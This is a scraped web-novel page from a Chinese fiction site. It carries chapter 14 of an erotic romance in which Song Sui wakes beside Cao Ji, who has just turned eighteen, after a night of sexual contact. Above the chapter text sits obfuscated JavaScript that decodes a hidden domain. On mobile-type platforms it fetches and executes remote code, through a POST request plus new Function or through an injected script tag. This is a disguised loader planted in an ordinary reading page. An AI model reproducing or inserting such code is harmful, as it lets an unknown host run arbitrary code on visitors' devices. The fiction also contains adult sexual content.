98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第十四章事后清晨(h)(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

第二天醒来,宋绥还在想,他们是怎么又睡在了一张床上的?

好像是因为,意乱情迷,情不自禁,情不自已就......

她记得原本在看电影,身体不舒服,曹棘帮她查看,然后帮她口了,后来不知道怎么就抱着来到了床上,滚做了一团。

虽然昨天没有进一步肉体上的触碰,可是只是“她和曹棘睡在一张床上”这个认知,就已经让她忍不住的脸红了。

宋绥现在被曹棘紧紧地箍在怀里面,她悄悄地抬起头,仔细地观察这个认识了很久的少年。

宋绥发现,他的鼻子很挺,鼻翼和嘴唇都有些单薄,却不显得刻薄,反而为他增加了几分清爽的少年气。

第一次见到他是什么样的?

那好像是个夏天,他还是个十叁四的小豆芽。

那个夏天的A市也如同往常一般的炎热,宋绥去A市找曹菡玩。两人在游乐场玩了没几个项目,就因为热得不行,打了个车去她家避暑。

曹菡从出租车上冲下来,来到门口,对着门就是“砰砰砰”几下猛锤,“曹棘!开门!”

宋绥当时在干什么?

曹菡家是带着院子的小楼房的一楼,宋绥从来没有看过这样设计的楼房,正在好奇的打量着在炎炎夏日也开的茂盛的不知名花朵。

有什么花是夏天开的?

宋绥以自己浅薄的知识,只知道荷花。

但院子里的花明显不是荷花。

白色的,有着细长的花瓣,包裹着淡黄色的蕊,在阳光下闪耀的有些刺眼。

“小绥,快来啦!”

直到曹菡叫她,才回过神。

宋绥应了一声,扭脸就看到了站在门边,冷着一张脸,有些单薄,削瘦的小男孩。

“吃糖吗?”不知道怎么着,宋绥脑子一抽,就把自己手里面在游乐场买的糖递了过去。这话刚说出来,就想抽自己一巴掌,对面的人是十叁四岁,又不是叁四岁。

宋绥想,这年龄的男孩子正是叛逆期,一定会生气的吧。

对面的男孩子,低下头,盯着她手里的糖,缓缓地眨了几下眼,伸手接了过去,“谢谢,小绥姐。”

作为独生子女的宋绥,因为这声“小绥姐”瞬间被讨好了,觉得面前这个弟弟特别顺眼。这哪是冷着一张脸,分明只是过于害羞而已!

几年不见,那个记忆中的小男孩,已经变成了翩翩的少年郎,甚至可以站在她面前,作为她的保护者。

宋绥忍不住伸出手,轻轻地放在曹棘的鼻梁上。看他没有被吵醒,又大着胆子描绘起他的五官。

鼻子,嘴巴,又向上来到眼睛。

这睫毛怎么这么长呀?

就在宋绥又陷入自己的沉思的时候,她轻抚上的眼皮颤了颤,睫毛也如同一只翩翩欲飞的蝴蝶的翅膀,轻轻地颤动。

为什么大家都要用蝴蝶的翅膀来形容长睫毛呢?

没有别的更适合的吗?

“在想什么呢,姐姐?”曹棘刚睡醒,还有些迷糊,将宋绥往自己搂得怀里更进一分。

“嗯?”曹棘的脑袋在她脖子上蹭了蹭,毛茸茸的头发,有些痒痒的,好像一只大型犬在向自己撒娇。

“曹棘,你多大了?”宋绥将脖子上的脑袋推开了一些。

“刚过十八,可以对自己的行为负责了。”曹棘好脾气地笑了笑,就又蹭到她身上想要亲一亲她。

他先是试探着轻轻地亲了亲宋绥的脸颊,看她这次没有抗拒,又进一步的去寻找她的嘴唇。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间